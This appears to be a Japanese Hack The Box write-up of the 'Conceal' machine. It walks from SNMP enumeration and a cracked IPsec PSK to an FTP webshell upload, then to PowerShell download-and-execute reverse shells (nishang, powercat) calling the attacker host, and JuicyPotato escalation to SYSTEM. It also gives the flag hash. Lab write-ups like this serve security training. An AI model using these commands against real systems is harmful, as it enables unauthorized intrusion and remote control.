Hack The Box 攻略してみた(Conceal)Writeup

nmap
TCP
nmap -sCTV -p- --stats-every 5s --min-rate 300 -oN nmap-tcp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 11 15:35:26 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds
UDP
nmap -sU -p- --stats-every 5s --min-rate 300 10.10.10.116 > nmap-udp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
500/udp open isakmp
# Nmap done at Mon Dec 11 15:41:40 2023 -- 1 IP address (1 host up) scanned in 354.67 seconds
snmp community name brute force
sudo nmap -Pn -sU --script snmp-brute 10.10.10.116 --min-rate 300 --script-args snmp-brute.communitiesdb=snmp-default.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 17:00 JST
Nmap scan report for 10.10.10.116
Host is up (0.27s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
500/udp open isakmp
Nmap done: 1 IP address (1 host up) scanned in 20.84 seconds
※snmp-default.txtはhttps://github.com/SECFORCE/sparta/blob/master/wordlists/snmp-default.txtからダウンロードした
snmpwalk
snmpwalk -c public -v1 10.10.10.116
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (4917278) 13:39:32.78
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3
iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4
(後略)
hash crack

ike-scan
ike-scan -M 10.10.10.116
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116 Main Mode Handshake returned
HDR=(CKY-R=2eaf4593e68ea822)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)
Ending ike-scan 1.9.5: 1 hosts scanned in 0.369 seconds (2.71 hosts/sec). 1 returned handshake; 0 returned notify
ipsec.confとipsec.secretsファイルの編集
sudo nano /etc/ipec.conf
# ipsec.conf - strongSwan IPsec configuration file
# basic configuration
config setup
conn %default
inactivity=1h
keyexchange=ikev1
ike=3des-sha1-modp1024
esp=3des-sha1
authby=secret
conn conceal
left=10.10.14.26
leftprotoport=tcp
right=10.10.10.116
rightprotoport=tcp
rightsubnet=10.10.10.116[tcp/%any]
type=transport
auto=add
※それぞれの値はike-scanで得られた情報を参照する
sudo cat /etc/ipsec.secrets
# This file holds shared secrets or RSA private keys for authentication.
# RSA private key for this host, authenticating it to any other host
# which knows the public part.
10.10.10.116 %any : PSK "Dudecake1!"
※PSKの値はcrackstationで判明した値を参照する
ipsec start
sudo ipsec start
[sudo] kali のパスワード:
Starting strongSwan 5.9.12 IPsec [starter]...
ipsec up
sudo ipsec up conceal
generating QUICK_MODE request 3024468123 [ HASH SA No ID ID ]
sending packet: from 10.10.14.26[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.26[500] (188 bytes)
parsed QUICK_MODE response 3024468123 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{1}
CHILD_SA conceal{2} established with SPIs c628a505_i b76a7e0e_o and TS 10.10.14.26/32[tcp] === 10.10.10.116/32[tcp]
connection 'conceal' established successfully
nmap
nmap -sCV -p- --stats-every 5s --min-rate 300 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65523 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
(後略)
http

gobuster
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.116/ -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.116/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]
===============================================================
Finished
===============================================================
http://10.10.10.116/upload/

ftp anonymous
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52079|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>
ftp file upload
cat test.txt
upload OK!!
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||52115|)
125 Data connection already open; Transfer starting.
100% |**************************************| 13 158.69 KiB/s --:-- ETA
226 Transfer complete.
13 bytes sent in 00:00 (0.03 KiB/s)
http://10.10.10.116/upload/

http://10.10.10.116/upload/test.txt

webshell upload
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put webshell.asp
local: webshell.asp remote: webshell.asp
229 Entering Extended Passive Mode (|||52240|)
125 Data connection already open; Transfer starting.
100% |**************************************| 1412 19.23 MiB/s --:-- ETA
226 Transfer complete.
※webshell.aspはhttps://github.com/tennc/webshell/blob/master/asp/webshell.aspからダウンロードする
http://10.10.10.116/upload/webshell.asp

reverse shell
powershell invoke-expression (New-Object Net.WebClient).DownloadString(‘http://10.10.14.26:8888/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 4444
※このコマンドをwebshell.aspの入力フォームで送信する
※Invoke-PowerShellTcp.ps1はhttps://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1からダウンロードする

python3のhttpサーバで待ち受け
python3 -m http.server 8888
10.10.10.116 - - [17/Dec/2023 02:20:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
ncで待ち受け
nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 52870
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
pfoof.txt
PS C:\Users\Destitute\Desktop> cat proof.txt
b1d83f0d1b2b2a99a93dbee0fcbfc8b6
privilege escalation
prigilege check
PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\>
JuicyPotato.exe及び.batファイルをupload
cat test.bat
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26:8888/powercat.ps1');powercat -c 10.10.14.26 -p 5555 -e cmd"
※powercat.ps1はhttps://github.com/besimorhino/powercat/blob/master/powercat.ps1でダウンロードする
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put test.bat
local: test.bat remote: test.bat
229 Entering Extended Passive Mode (|||53549|)
125 Data connection already open; Transfer starting.
100% |**************************************| 147 1.86 MiB/s 00:00 ETA
226 Transfer complete.
147 bytes sent in 00:00 (0.34 KiB/s)
※アップロードの際はbinaryモードで実行する(改行コードなどがOS別で変換されることがあるため)
ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put JuicyPotato.exe
local: JuicyPotato.exe remote: JuicyPotato.exe
229 Entering Extended Passive Mode (|||53529|)
125 Data connection already open; Transfer starting.
100% |**************************************| 339 KiB 48.61 KiB/s 00:00 ETA
226 Transfer complete.
347648 bytes sent in 00:07 (46.18 KiB/s)
※アップロードの際はbinaryモードで実行する(改行コードなどがOS別で変換されることがあるため)
JuicyPotato実行
PS C:\inetpub\wwwroot> PS C:\inetpub\wwwroot> ./JuicyPotato.exe -l 443 -p test.bat -t * -c '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 443
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
python3のhttpサーバで待ち受け
python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.10.116 - - [17/Dec/2023 02:50:09] "GET /powercat.ps1 HTTP/1.1" 200 -
ncで待ち受け
nc -lnvp 5555
listening on [any] 5555 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 53777
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
proof.txtはいつもの場所です。
コメント